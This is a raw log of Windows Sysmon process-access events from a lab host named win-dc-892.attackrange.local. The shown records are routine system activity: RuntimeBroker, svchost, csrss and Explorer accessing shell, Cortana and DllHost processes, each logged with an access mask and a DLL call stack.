12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.270{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.270{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.270{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.254{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.254{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.254{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.254{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.239{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.239{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.239{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.239{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.239{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.239{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
